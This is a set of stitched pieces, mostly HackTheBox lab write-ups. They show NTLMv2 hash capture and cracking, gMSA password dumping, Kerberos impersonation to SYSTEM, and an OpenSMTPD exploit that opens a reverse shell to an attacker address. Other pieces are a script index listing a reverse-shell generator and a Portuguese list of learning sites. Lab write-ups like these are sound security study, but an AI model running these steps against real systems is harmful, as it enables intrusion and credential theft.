[+] Listening for events...
[HTTP] NTLMv2 Client : 10.10.10.248
[HTTP] NTLMv2 Username : intelligence\Ted.Graves
[HTTP] NTLMv2 Hash : Ted.Graves::intelligence:56a451bae5444f2f:B37BCD29A6988BDE93080B5C014E6713:0101000000000000BD89679D598BD7012B72306C124A485B000000000200060053004D0042000100160053004D0042002D0054004F004F004C004B00490054000400120073006D0062002E006C006F00630061006C000300280073006500720076006500720032003000300033002E0073006D0062002E006C006F00630061006C000500120073006D0062002E006C006F00630061006C0008003000300000000000000000000000002000003D39864916282ECAE67583BE2ED7D66D346B2F3DF9CC442D6A4802A511C9FC8C0A001000000000000000000000000000000000000900320048005400540050002F007700650062002E0069006E00740065006C006C006900670065006E00630065002E006800740062000000000000000000
```
We get an NTLMv2 hash of ```intelligence\Ted.Graves``` user, By cracking it using ```john``` we get:
```console
┌─[evyatar@parrot]─[/hackthebox/Intelligence]
└──╼ $ john --show hash
Ted.Graves:Mr.Teddy:intelligence:56a451bae5444f2f:B37BCD29A6988BDE93080B5C014E6713:0101000000000000BD89679D598BD7012B72306C124A485B000000000200060053004D0042000100160053004D0042002D0054004F004F004C004B00490054000400120073006D0062002E006C006F00630061006C000300280073006500720076006500720032003000300033002E0073006D0062002E006C006F00630061006C000500120073006D0062002E006C006F00630061006C0008003000300000000000000000000000002000003D39864916282ECAE67583BE2ED7D66D346B2F3DF9CC442D6A4802A511C9FC8C0A001000000000000000000000000000000000000900320048005400540050002F007700650062002E0069006E00740065006C006C006900670065006E00630065002E006800740062000000000000000000
```
Let's login with those credentials ```Ted.Graves:Mr.Teddy``` to ```Users``` share using ```smbclient```.
### User 3
Let's run [BloodHound.py](https://github.com/fox-it/BloodHound.py) to look at what we can do using our username:
```console
┌─[evyatar@parrot]─[/hackthebox/Intelligence]
└──╼ $ python3 bloodhound.py -c all -u Ted.Graves -p Mr.Teddy -d intelligence.htb -gc dc.intelligence.htb -ns 10.10.10.248 --zip
INFO: Found AD domain: intelligence.htb
INFO: Connecting to LDAP server: dc.intelligence.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 2 computers
INFO: Connecting to LDAP server: dc.intelligence.htb
INFO: Found 42 users
INFO: Found 54 groups
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: svc_int.intelligence.htb
INFO: Querying computer: dc.intelligence.htb
WARNING: Could not resolve: svc_int.intelligence.htb: The DNS operation timed out after 3.000938892364502 seconds
INFO: Done in 00M 18S
INFO: Compressing output into 20210807234232_bloodhound.zip
```
By analyzing the ```Shortest Paths to Unconstrained Delegation Systems``` we get:
![blood_dc.png](images/blood_dc.png)
As we can see, we need to get user ```svc_int``` using ```ReadGMSAPassword```, Then get DC using ```Allow to Delegate``` / ```Unconstrained Delegation```.
Using this article [http://blog.redxorblue.com/2019/12/no-shells-required-using-impacket-to.html](http://blog.redxorblue.com/2019/12/no-shells-required-using-impacket-to.html) we can do it without a shell.
So first, Let's get user ```svc_int``` by ```ReadGMSAPassword``` using [gMSADumper](https://github.com/micahvandeusen/gMSADumper):
```console
┌─[evyatar@parrot]─[/hackthebox/Intelligence]
└──╼ $ python3 gMSADumper.py -u Ted.Graves -p Mr.Teddy -d intelligence.htb
Users or groups who can read password for svc_int$:
> DC$
> itsupport
svc_int$:::47e89a6afd68e3872ef1acaf91d0b2f7
```
Now we have the user ```svc_int```.
### Root
Next, Let's create ```ccache``` file as Administrator as follow:
```console
┌─[evyatar@parrot]─[/hackthebox/Intelligence]
└──╼ $ python3 getST.py intelligence.htb/svc_int$ -spn WWW/dc.intelligence.htb -hashes :47e89a6afd68e3872ef1acaf91d0b2f7 -impersonate Administrator
Impacket v0.9.24.dev1+20210726.180101.1636eaab - Copyright 2021 SecureAuth Corporation
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator.ccache
```
Next, we need to export the ```ccache``` file to ```KRB5CCNAME```:
```console
┌─[evyatar@parrot]─[/hackthebox/Intelligence]
└──╼ $ export KRB5CCNAME=/hackthebox/Intelligence/Administrator.ccache
```
And now we can run ```psexec.py``` as follow:
```console
┌─[evyatar@parrot]─[/hackthebox/Intelligence]
└──╼ $ python psexec.py -dc-ip 10.10.10.248 -target-ip 10.10.10.248 -no-pass -k intelligence.htb/Administrator@dc.intelligence.htb
Impacket v0.9.24.dev1+20210726.180101.1636eaab - Copyright 2021 SecureAuth Corporation
[*] Requesting shares on 10.10.10.248.....
[*] Found writable share ADMIN$
[*] Uploading file hJZgRNfT.exe
[*] Opening SVCManager on 10.10.10.248.....
[*] Creating service YFYL on 10.10.10.248.....
[*] Starting service YFYL.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.1879]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system
C:\Windows\system32>type C:\users\administrator\desktop\root.txt
29fdad6f113be5f0219b74e98234c214
C:\Windows\system32>
```
And we get the root flag ```29fdad6f113be5f0219b74e98234c214```. |
# Scripts
- Some of the dump scripts created while playing !
- Nvm if it isnt attaractive !!
### hackthebox
- arkham.py --> Have the ysoserial in the current directory and pass the arguments, `url`, `command`, `secretkey`
- htb-machines.py --> Prints the htb machines from its api
- name_grab.py --> Grabs the file names in the git repo, created for traceback machine.
- nc-portscan.sh --> Port scanner using nc
- rev-shells.py --> Generates reverseshell based on the provided switch `bash, nc, python, perl, ruby, php, socat`
- snapwr3nch.py --> prints the htb machine pwned achievement to a image file
- travel.py --> Automated SSRF with gopher scheme and obtains shell as `www-data`
- wr3nch.py --> first ever created automation script for htb */not so good/, dont want to make changes since its the starting step*
- xpath-inj.py --> XPath Injection on login with usernamed loaded to the script
### installation
#### Docker installation scripts
- docker-linux.sh
- docker-parrot.sh
- docker-standard.sh
- fping-install.sh --> fping is used to perform network sweep and obtain available users information
- pwntools-python3.sh --> installs pwntools
- ptyhon[2|3]-pip.sh --> installs pip2.* and pip3.*
### misc
- adapter.sh --> When used with [.p10k.zsh](https://github.com/romkatv/powerlevel10k) example function , if the vpn is available, it will show in the right side
- bashrc_custom --> Copy the files content and into `~/.bashrc` file and source it. Enjoy 😉. Best with tmux !
- fix-bg-noise-obs.sh --> fixes the background static noise in linux when recorded using obs studio
- pdf-protect.sh --> script I use to protect writeup pdf's with password
- report-gen.md --> model md file to genereate pdfs with latex
- report.sh --> generates pdf from markdown using latex |
# Sobre esse repositório
- Esse repositório foi criado por mim [Fernanda Souza](https://github.com/leitoraincomum) com o intuito de divulgar ferramentas gratuitas que possam auxiliar pessoas em seus estudos.
- Se conhece alguma que não está listada, faça forx desse repositório e abra uma solicitação de alteração (pull request).
# Sites com exercícios
- *Sites com exercícios para treinar*
|Nome com Link | Sistema de Pontuação? | Salva Projetos? | Linguagens Suportadas | Observações |
| ---------------- | ---------------- |---------- |----------- | -------- |
|[Bento.IO](https://bento.io)| Sim | Não | Nenhuma específica | Plataforma de auxilio a se tornar autodidata em programação (em inglês)|
|[Code](https://code.org)| Não | Sim | Não disponível | Cursos de treino de lógica, entre outros para pessoas iniciantes |
|[Code Academy](https://www.codecademy.com/)| Não | Não Sei| Diversas áreas de conhecimento| -------------|
|[Code Chef](https://www.codechef.com/ide)| Sim | Sim | As principais de competições de programação| Site para treinamento em competições de programação |
|[Code Wars](https://www.codewars.com/)| Sim | Sim | CoffeScript, Coq, Go, NASM, Scala, Shell, entre outras.| Plataforma com exercícios para estudo de diversas linguagens (em inglês) |
|[Coding Game](https://www.codingame.com/start) | Não sei | Sim | Bash, C, C++, C#, Clojure, D, Dart, F#, Go, Groovy, Haskell, Java, JavaScript, Kotlin, Lua, Objective-C, OCaml, Pascal, PHP, Python, Ruby, Rust, Scala, Swift, TypeScript e VB.NET | --------- |
|[Coursera](https://www.coursera.org/)| Não | Não | Diversas | Plataforma de cursos gratuitos com certificado |
|[Exercism](https://exercism.org/)| Sim | Sim | Diversas (55 linguagens) | Plataforma 100% free, para aprender e praticar |
|[Flex Box](https://flexboxfroggy.com)| Não | Não | Flex Box (CSS) | Desafios para treinar FLex Box |
|[Free Code Camp](https://www.freecodecamp.org)| Não | Não | Diversas | Plataforma de certificação de habilidades técnicas gratuita (em inglês) |
|[Hackr.IO](https://hackr.io) | Não | Não | Diversas | Agregador de cursos online, gratuitos e pagos |
|[Hacker Rank](https://www.hackerrank.com)| SIM | Não | Angular, C#, CSS, Go, Java, JavaScript, Node, Node.js, Python, R, React, Rest API, SQL e etc. | Modos básicos e intermediários |
|[Khan Academy](https://pt.khanacademy.org) | Sim | Não | Lógica e outras disciplinas | --------- |
|[Koans Kotling](https://play.kotlinlang.org/koans/Introduction/Hello,%20world!/Task.kt)| Não | Não | Kotlin | Teste de estruturas Kotlin para aprendizado |
|[URI On Line](https://www.urionlinejudge.com.br) | SIM | Não | C, C++, C#, Clojure, Dart, Go, Haskell, Java, JavaScript, Kotlin, PHP, Python, R, Ruby, Rust e Scala | 6 Modos desde o iniciante, com Hello World! |
|[Kaggle](https://www.kaggle.com/) | SIM | Não | Python, R, SQL | Maior site de referência para aprendizado de Data Science, Machine Learn e afins |
|[LeetCode](https://leetcode.com/) | SIM | Não | C, C++, C#, Go, Java, JavaScript, Kotlin, PHP, Python, Python3, R, Ruby, Rust, MySQL, MS SQL, Oracle, Bash, Swift, Rust, Typescript, Racket, Erlang e Elixir | Site muito bom para treinar programação e estudar pra entrevista de código, tem módulos básicos, intermediários e avançados. Sessão com materiais de estudos com prática e contest toda semana. |
|[Grid Garden](https://cssgridgarden.com/) | Não | Não | CSS | Site para aprender e treinar css grid layout |
|[CSS Battle](https://cssbattle.dev/) | Sim | Sim | HTML, CSS | Site de competição de css com menor numero de caracteres |
|[Coding Game](https://www.codingame.com/)| Sim | Sim | Bash, C, C#, C++, Clojure, D, Dart, F#, Go, Groovy, Haskell, Java, Javascript, Kotlin, Lua, ObjectiveC, OCaml, Pascal, Perl, PHP, Python3, Ruby, Rust, Scala, Swift, TypeScript, VB.NET| Site para competir e aprender criando algoritmos para jogar|
|[Kattis](https://open.kattis.com/)| Sim | Sim | C, C#, C++, COBOL, F#, Go, Haskell, Java, Node.js, SpiderMonkey(JS), Kotlin, Common Lisp, Objective-C, OCaml, Pascal, PHP, Prolog, Python 2, Python 3, Ruby, Rust | Site com desafios de algoritimo para treinar, com rank de países e universidades |
|[Exercícios Kotlin - Kotlinautas](https://github.com/Kotlinautas/curso-kotlinautas)| Não | Não | Kotlin | Projeto com exercícios de Kotlin em pt-br que pode ser utilizado dentro da IDE Intellij Community com o plugin EduTools |
|[SQL Murder mistery](https://mystery.knightlab.com/walkthrough.html) | Não | Não | SQL | Site com explicação/tutoriais interativos de sql que com os resultados ajudam a resolver um mistério |
|[C4n y0u H4ck 1t](https://hack.ainfosec.com/) | Sim | Não | |Site com desafios de segurança, simples e avançados (Os pontos podem ser usados para se candidatar a empresa) |
|[Can You Hack Us?](https://canyouhack.us/) | Sim | Não | |Site com desafios de segurança (desde a pagina inicial)|
|[Hack the box](https://www.hackthebox.com/)| Sim | Sim | |Site com desafios de segurança|
|[Try Hack me](https://tryhackme.com/) | Sim | Sim | |Site com desafios e tutorias de segurança |
|[SoloLearn](https://www.sololearn.com/)| Sim | Não | Diversas | Diversos cursos gratuitos de programação com certificado. (em inglês)|
# IDE's online
- *Caso queira estudar linguagens e não possa ou não queira instalar uma IDE, existem essas online*
|Nome com Link | Sistema de Pontuação? | Salva Projetos? | Linguagens Suportadas | Observações |
| ---------------- | ----------- | ---------------- | ----------- | -------- |
|[Code Sand Box](https://codesandbox.io)| Não | Sim | HTML, CSS, Node.js, [entre outras](https://codesandbox.io/docs/start) | Plataforma para projetos front-end |
|[DartPad](https://dartpad.dev/) | Não | Não | Dart | --------- |
|[Glitch](https://glitch.com/) | Não | Sim | Linguagens para aplicações web | IDE e comunidade para aplicações web |
|[IDEONE](https://ideone.com)| Não | Sim | Ada95, Assembler, AWK, Bash, C99, Cobol, COBOL 85, Fortran, Go, SQLite, Swift, [entre outras](https://ideone.com/credits)| ------ |
|[Learn Git](https://learngitbranching.js.org/?locale=pt_BR)| Não | Não | Git | Aqui você pode aprender no passo a passo ou treinar no modo sandbox! |
|[OnLineGDB](https://www.onlinegdb.com) | Não | Sim | C, C++, Python, PHP, Ruby, C#, VB, Perl, Swift, Prolog, Javascript, Pascal, HTML, CSS e JavaScript | -------- |
|[Online IDE](https://www.online-ide.com)| Não | Não | Bash, C, C++, Go Lang, Java, PHP, Python, R e Ruby | Não tem sistema de login para usar |
|[ReplIt](https://repl.it/)| Não | Sim | Bloop, Deno, Julia, Lua, Nim, Raku, Roy, [entre outras](https://replit.com/site/about) | -------- |
|[vscode(beta)](https://vscode.dev/)| Não | Localmente | C/C++, C#, Java, PHP, Rust, Go, TypeScript, JavaScript, Python, JSON, HTML, CSS, and LESS, [entre outras](https://code.visualstudio.com/blogs/2021/10/20/vscode-dev)|
|[CodePen](https://codepen.io/)| Não | Sim | HTML, CSS, JavaScript | Editor de códigos front end. Suporta importação de scripts, fontes e CSS externos. Feedback imediato das atualizações feitas. Ótimo para treinar CSS :)
# Outras Ferramentas
- *Outras ferramentas de aprendizado gratuitas*
|Nome com Link | Sistema de Pontuação? | Linguagens Suportadas | Descrição |
| ---------------- | --------------------------- | ----------- | -------- |
|[APP Inventor](http://ai2.appinventor.mit.edu/) | Não | Indefinida | Site para construção de aplicações mobile para iniciantes usando métodos de blocos para programação |
|[Cron App](https://www.cronapp.io/) | Não | Diversas | Plataforma de desenvolvimento de projetos de aplicações web em nuvem |
|[Read Me](https://readme.so/editor)| Não | Read Me | Site para criação de ReadMe para seus projetos |
|[Free for Dev](https://free-for.dev/)| Não | Diversas | Site com serviços, ferramentas e recursos gratuitos para devs (hospedagem, cloud, monitoramento, testes, etc)
# Extras
- *Cursos, vídeo aulas, etc. gratuitos*
|Nome com Link | Tipo de Conteúdo | Feito por: |
| ------ | -------- | -------- |
| [4Noobs](https://github.com/he4rt/4noobs) | Tutorais e guias de diversos tópicos com nível iniciante em TI | Comunidade He4rt |
|[Blog Kotlin](https://blog.kotlin-academy.com/best-kotlin-free-online-courses-5838cb7063c6) | Página do blog oficial da linguagem Kotlin com cursos gratuitos com a missão de simplificar o aprendizado do Kotlin | Mantenedores da Linguagem |
|[Curso em Video](https://www.cursoemvideo.com/course/)| Portal de ensino com diversos cursos como Linux, Redes, Python, Java, PHP, Javascript, HTML, CSS, entre muitos outros| Gustavo Guanabara |
|[Descomplicando o Docker](https://www.youtube.com/watch?v=0cDj7citEjE&list=PLf-O3X2-mxDk1MnJsejJwqcrDC5kDtXEb)| Série de vídeo aulas | Jeferson Fernando ([LinuxTips](https://www.linuxtips.io)) |
|[Descomplicando Kubernets](https://www.youtube.com/playlist?list=PLf-O3X2-mxDmXQU-mJVgeaSL7Rtejvv0S)| Série de vídeo aulas | Jeferson Fernando ([LinuxTips](https://www.linuxtips.io)) |
|[DEV CHALLENGE](https://www.devchallenge.com.br/challenges)| Desafios de front-end, back-end e mobile | [Lorena Montes](https://www.linkedin.com/in/lorenagmontes/) |
|[Diego Mariano](https://diegomariano.com/home/#free-courses)| Portal de cursos que contém cursos gratuitos com certificado em tópicos como HTML, CSS, Linux, SQL, PHP, entre outros| Diego Mariano|
|[Introdução Js](http://betrybe.com/curso-gratuito-js)| Curso introdutório de JavaScript | Trybe |
|[loiane.training](https://loiane.training/cursos)| Cursos de Java, Angular, Phoneag e Apache Cordova, Fundamentos EXT JS 4 | [Loiane Groner](https://www.youtube.com/channel/UCqQn92noBhY9VKQy4xCHPsg)|
|[PHP do Jeito Certo](http://br.phptherightway.com)| Tutorial de PHP em texto | Josh Lockhart e [colaboradores](http://br.phptherightway.com/#site-footer)|
|[Poke PHP](https://pokephp.com.br)| Série de vídeo aulas | Rodrigo "PokemaoBR" Cardoso |
|[Kitten](https://kitten.code.game)| Plataforma lúdica de criação de games com foco em pessoas entre 3 e 18 anos | Codemao (Shenzhen Dianmao Technology Co., Ltd) |
|[Solyd](https://solyd.com.br/treinamentos/)| Introdução ao Hacking e Pentest e Python básico | Solyd|
|[WoMakersCode](https://maismulheres.tech/courses)| Cloud Computing, DevOps, Data Science, Inteligência artifical e muito mais| Microsoft|
|[Learn Ayything](https://learn-anything.xyz)| Trilhas com cursos, vídeos, artigos e repositórios do GitHub sobre qualquer assunto | Nikita Voloboev e Angelo Gazzola |
|[Microsoft Learn](https://docs.microsoft.com/pt-br/learn/)| Trilhas com tutoriais escritas sobre diversas tecnologias e ferramentas | Microsoft |
|[App Ideas](https://github.com/florinpop17/app-ideas)| Repositório com desafios de programação desde o iniciante até projetos avançados | Florin Pop |
# API
- *Sites com concentração de API's para projetos*
|Nome com link | Descrição | Mantido por: |
| ------ | ----- | ------ |
|[RapiDapi](https://rapidapi.com/pt/marketplace)| Coleção de API's | RapidAPI |
|[BrasilAPI](https://brasilapi.com.br/docs) | Projeto de código aberto, que transforma o Brasil em uma API | Comunidade |
|[Public APIs](https://github.com/public-apis/public-apis)| Repositório com várias APIs gratuitas dos mais diversos assuntos|Public APIs|
|[Any API](https://any-api.com/)| Site com diversas apis abertas de diversos nichos | LucyBot Inc.|
<!--
# Verificar
|Nome com link | ---- | --------- |
| ------ | ----- | ------ |
| | | | --------- |
--!>
|
<p align="center"><img src="src/banner.png" alt="Banner"></img></p>
<p align="center">Creator: <a href="https://app.hackthebox.eu/polarbearer/159204">polarbearer</a></p>
# Personal thoughts
A hard box which has less solvers even than an insane box! Made me learn a lot of stuff like dns records, proxychaining, kerberos and so on... As usual, I tried to explain the steps as simple as I can. Hope you'll find it useful; if so, consider [suporting](https://www.buymeacoffee.com/f4T1H21) a student to get `OSCP` exam and +respecting my profile in HTB.
<a href="https://app.hackthebox.eu/profile/184235">
<img src="https://www.hackthebox.eu/badge/image/184235" alt="f4T1H">
</img>
</a>
<br>
<a href="https://www.buymeacoffee.com/f4T1H21">
<img src="https://raw.githubusercontent.com/f4T1H21/f4T1H21/main/support.png" height="40" alt="Support">
</img>
</a><br><br>
Now, let me get right into it.
---
# Reconnaissance
The cliche... :
```bash
nmap -sS -sV -sC -p- 10.10.10.224
```
```bash
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey:
| 3072 8d:dd:18:10:e5:7b:b0:da:a3:fa:14:37:a7:52:7a:9c (RSA)
| 256 f6:a9:2e:57:f8:18:b6:f4:ee:03:41:27:1e:1f:93:99 (ECDSA)
|_ 256 04:74:dd:68:79:f4:22:78:d8:ce:dd:8b:3e:8c:76:3b (ED25519)
53/tcp open domain ISC BIND 9.11.20 (RedHat Enterprise Linux 8)
| dns-nsid:
|_ bind.version: 9.11.20-RedHat-9.11.20-5.el8
88/tcp open kerberos-sec MIT Kerberos (server time: 2021-06-17 12:49:01Z)
3128/tcp open http-proxy Squid http proxy 4.11
|_http-server-header: squid/4.11
|_http-title: ERROR: The requested URL could not be retrieved
9090/tcp closed zeus-admin
Service Info: Host: REALCORP.HTB; OS: Linux; CPE: cpe:/o:redhat:enterprise_linux:8
```
Here we have three ports except `22/ssh`, let's start with the kerberos server at the port `88/kerberos-sec`.
## 88/kerberos-sec
Actually, we don't have much choice here, let's take a look at the binary web content:
```bash
curl http://10.10.10.224:88 --http0.9 --output - | strings
```
```
`~^0\
20210618150926Z
REALCORP.HTB
krbtgt
REALCORP.HTB
```
We got two things here:
- `REALCORP.HTB` which is a domain. (Also a clue about __default Kerberos 5 realm__)
- `krbtgt` which is the local default account which acts as a service account for the Key Distribution Center (KDC) service.
Add the domain to `/etc/hosts` and let's continue with the port `3128/http-proxy`.
## 3128/http-proxy
![](src/3128browser.png)
Here we got another two things:
- `j.nakazawa@realcorp.htb` a username and another domain.
- `srv01.realcorp.htb` a new __subdomain__.
See the subdomain? Maybe we need to enumerate the `53/dns` to find out what's going on.
## 53/dns
As I mentioned my previous writeups, I love using `gobuster`. You can go with `dnsenum`, `wfuzz` or your own tool...
- Let's go with the domain we found in the __mail__ address.
```bash
┌──(root💀kali)-[~/hackthebox/tentacle]
└─> gobuster -q dns -d realcorp.htb -r 10.10.10.224:53 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -i
Found: ns.realcorp.htb [10.197.243.77]
Found: proxy.realcorp.htb [10.197.243.77]
Found: wpad.realcorp.htb [10.197.243.31]
Found: srv01.realcorp.htb [10.10.10.224]
```
Oh, here we found new subdomains and two new ip addresses. `proxy.realcorp.htb` is a [`CNAME`](https://en.wikipedia.org/wiki/CNAME_record) record to `ns.realcorp.htb` and `ns` stands for nameserver.<br>
As you can guess, we can't access these ips directly, which means we need to use proxychaining to access them for this case.
### `proxychains` configuration
We are going to use a tool called `proxychains`, so make sure you installed it on your system.<br>
Do comment any other proxy entries and add the following lines at the end of your `/etc/proxychains.conf` file.
```
http 10.10.10.224 3128
http 127.0.0.1 3128
http 10.197.243.77 3128
```
We're going with `strict_chain` but you can go with `dynamic_chain` too.
- Here's a [video](https://www.youtube.com/watch?v=NN9fQwiomAU) to understand `proxychains` mechanism.
Now, we're ready to look at the ip: `10.197.243.31`<br>
Let's scan it:
```bash
┌──(root💀kali)-[~/hackthebox/tentacle]
└─> proxychains -q nmap -sT -Pn 10.197.243.31 --top-ports 1000
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-18 19:34 +03
Nmap scan report for wpad.realcorp.htb (10.197.243.31)
Host is up (0.24s latency).
Not shown: 993 closed ports
PORT STATE SERVICE
22/tcp open ssh
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
464/tcp open kpasswd5
749/tcp open kerberos-adm
3128/tcp open squid-http
Nmap done: 1 IP address (1 host up) scanned in 241.18 seconds
```
### WPAD (Web Proxy Auto-Discovery Protocol)
>[WPAD](https://en.wikipedia.org/wiki/Web_Proxy_Auto-Discovery_Protocol) is a method used by clients to locate the URL of a configuration file using DHCP and/or DNS discovery methods. Once detection and download of the configuration file is complete, it can be executed to determine the proxy for a specified URL. Default name for the configuration file is: `wpad.dat`
Here we see an http server, let's look for the file.
- First add `10.197.243.31 wpad.realcorp.htb` to your `/etc/hosts`.
```bash
┌──(root💀kali)-[~/hackthebox/tentacle]
└─> proxychains -q curl http://wpad.realcorp.htb/wpad.dat
function FindProxyForURL(url, host) {
if (dnsDomainIs(host, "realcorp.htb"))
return "DIRECT";
if (isInNet(dnsResolve(host), "10.197.243.0", "255.255.255.0"))
return "DIRECT";
if (isInNet(dnsResolve(host), "10.241.251.0", "255.255.255.0"))
return "DIRECT";
return "PROXY proxy.realcorp.htb:3128";
}
```
This time we catch a tartar, that's a totally new `subnet`...<br>
We can't use host discovery in `nmap`, that makes things too long. But I used my mind and made things easier; while scanning the whole ip range, I encountered one ` ... OK` and moved from that ip address.
![](src/subnetscan.png)
# Foothold: CVE 2020-7247
Let's scan this ip address's running service versions:
```bash
proxychains nmap -sT -sV -Pn 10.241.251.113 --top-ports 100
```
```c
PORT STATE SERVICE VERSION
25/tcp open smtp OpenSMTPD
Service Info: Host: smtp.realcorp.htb
```
After googling a bit about `OpenSMTPD`, I found [this](https://www.qualys.com/2020/01/28/cve-2020-7247/lpe-rce-opensmtpd.txt) article. Now time to exploit it, I tried many exploits from the internet but I'm going to recommend you to use my PoC exploit from [this](https://github.com/f4T1H21/CVE-2020-7247) link. You can see, it definitely makes sense!
```bash
┌──(root💀f4T1H)-[~/hackthebox/tentacle]
└─> proxychains -q python3 exploit.py 10.241.251.113 25 j.nakazawa@realcorp.htb 10.10.14.166 2121
[+] Opening connection to 10.241.251.113 on port 25: Done
[+] Target port is running OpenSMTPD!
[+] Sending HELO: Done
[+] Target is vulnerable!
[+] Checking the mail address: Valid
[+] Sending the payload: Done
[*] Closed connection to 10.241.251.113 port 25
---------------------------------------------------------
[+] Trying to bind to 10.10.14.166 on port 2121: Done
[+] Waiting for connections on 10.10.14.166:2121: Got connection from 10.10.10.224 on port 36780
[*] Switching to interactive mode
bash: cannot set terminal process group (545): Inappropriate ioctl for device
bash: no job control in this shell
root@smtp:~> $ id
id
uid=0(root) gid=0(root) groups=0(root)
root@smtp:~> $
```
Here we finally got a shell as `root`, but in the `smtp` server.
After a bit of enumeratig, I found `msmtp` client configuration file in `/home/j.nakazawa/.msmtprc`.
```bash
root@smtp:/home/j.nakazawa> $ cat .msmtprc
cat .msmtprc
# Set default values for all following accounts.
defaults
auth on
tls on
tls_trust_file /etc/ssl/certs/ca-certificates.crt
logfile /dev/null
# RealCorp Mail
account realcorp
host 127.0.0.1
port 587
from j.nakazawa@realcorp.htb
user j.nakazawa
password sJB}RM>6Z~64_
tls_fingerprint C9:6A:B9:F6:0A:D4:9C:2B:B9:F6:44:1F:30:B8:5E:5A:D8:0D:A5:60
# Set a default account
account default : realcorp
root@smtp:/home/j.nakazawa> $
```
And here we got some credentials: `j.nakazawa`:`sJB}RM>6Z~64_`<br>
But weirdly ssh was not working for direct login with these credentials!<br><br>
Thinking about generally a little bit, gives us the big clue: As you can remember we have a `kerberos-sec` server on the main target, which means we can use tickets to authenticate in something if it configured properly!
![](/src/gifs/bingobango.gif)
Okay, let me take one step back:
- What is `kerberos`?
>A computer-network authentication protocol that works on the basis of tickets to allow nodes communicating over a non-secure network to prove their identity to one another in a secure manner.
## Creating a `kerberos` ticket
### Step #1
First install the package by typing:
```bash
apt-get install krb5-user
```
__Attention__: Now we need to configure the kerberos by editing `/etc/krb5.conf`, for that you need to add following lines to their proper sections in the file.
```bash
[libdefaults]
default_realm = REALCORP.HTB
[realms]
REALCORP.HTB = {
kdc = 10.10.10.224
}
[domain_realm]
.realcorp.htb = REALCORP.HTB
```
### Step #2
Create a ticket for the user `j.nakazawa`:
```bash
┌──(root💀f4T1H)-[~/hackthebox/tentacle]
└─> kinit j.nakazawa
Password for j.nakazawa@REALCORP.HTB:
```
Enter the password, and we're ready to go. But first, check the ticket we created:
```bash
┌──(root💀f4T1H)-[~/hackthebox/tentacle]
└─> klist
Ticket cache: FILE:/tmp/krb5cc_0
Default principal: j.nakazawa@REALCORP.HTB
Valid starting Expires Service principal
06/19/2021 07:12:33 06/20/2021 07:00:21 krbtgt/REALCORP.HTB@REALCORP.HTB
```
__Atention__: Make sure you only have the following domain for the `10.10.10.224` ip address in your `/etc/hosts` file.
```c
10.10.10.224 srv01.realcorp.htb
```
## Step #3
Connect directly via ssh as the user `j.nakazawa`:
```bash
┌──(root💀f4T1H)-[~/hackthebox/tentacle]
└─> ssh j.nakazawa@10.10.10.224
Activate the web console with: systemctl enable --now cockpit.socket
Last login: Sat Jun 19 05:26:12 2021 from 10.10.14.166
[j.nakazawa@srv01 ~]$ id
uid=1000(j.nakazawa) gid=1000(j.nakazawa) groups=1000(j.nakazawa),23(squid),100(users) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[j.nakazawa@srv01 ~]$
```
Here we finally got the user ...
# Privilege escalation:
## Escalating `admin`: Cronjob abuse
While enumerating the box, I came out with the following `cronjob`:
```bash
[j.nakazawa@srv01 ~]$ cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
# For details see man 4 crontabs
# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
* * * * * admin /usr/local/bin/log_backup.sh
[j.nakazawa@srv01 ~]$
```
__/usr/local/bin/log_backup.sh__
```bash
#!/bin/bash
/usr/bin/rsync -avz --no-perms --no-owner --no-group /var/log/squid/ /home/admin/
cd /home/admin
/usr/bin/tar czf squid_logs.tar.gz.`/usr/bin/date +%F-%H%M%S` access.log cache.log
/usr/bin/rm -f access.log cache.log
```
Basically this script copies all the content of `/var/log/squid/` to `/home/admin`.
```bash
[j.nakazawa@srv01 tmp]$ id
uid=1000(j.nakazawa) gid=1000(j.nakazawa) groups=1000(j.nakazawa),23(squid),100(users) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[j.nakazawa@srv01 tmp]$ ls /var/log -lah | grep squid
drwx-wx---. 3 admin squid 53 Jun 19 05:49 squid
[j.nakazawa@srv01 tmp]$
```
Here you can see we are in the group of `squid`, we can write and execute the content of `/var/log/squid`. So if we put something into `/var/log/squid` it'll be copied to `/home/admin`. It may take a long or a short time depending on the size of the directory.<br><br>
The initial idea was copying our public ssh key to `/home/admin/.ssh/authorized_keys`, but after further testing I came out to the conclusion that it is not allowed/enabled.
Hmm let's think about the clue, you remember what was it? Yeah, you're right it is literally: `Kerberos`<br>
After some googling, I got [this](https://web.mit.edu/kerberos/krb5-1.5/krb5-1.5.4/doc/krb5-user/Granting-Access-to-Your-Account.html) article.
>If you need to give someone access to log into your account, you can do so through `Kerberos`, without telling the person your password. Simply create a file called `.k5login` in your home directory. This file should contain the `Kerberos principal` of each person to whom you wish to give access. Each principal must be on a separate line. Here is a sample `.k5login` file:
```
jennifer@ATHENA.MIT.EDU
avid@EXAMPLE.COM
```
Let's try that:
```bash
[j.nakazawa@srv01 ~]$
mkdir tmp
echo j.nakazawa@REALCORP.HTB | tee tmp/.k5login
cp tmp/.k5login /var/log/squid
you@yourlocalmachine:~$
ssh admin@10.10.10.224
```
![](src/admin.png)
Yupp, that works!
## Escalating `root`: Misconfigured keytab
Actually we noticed this file earlier but as we hadn't had permissions on that, we couldn't use it.<br>
The file is: `/etc/krb5.keytab` Fine but,
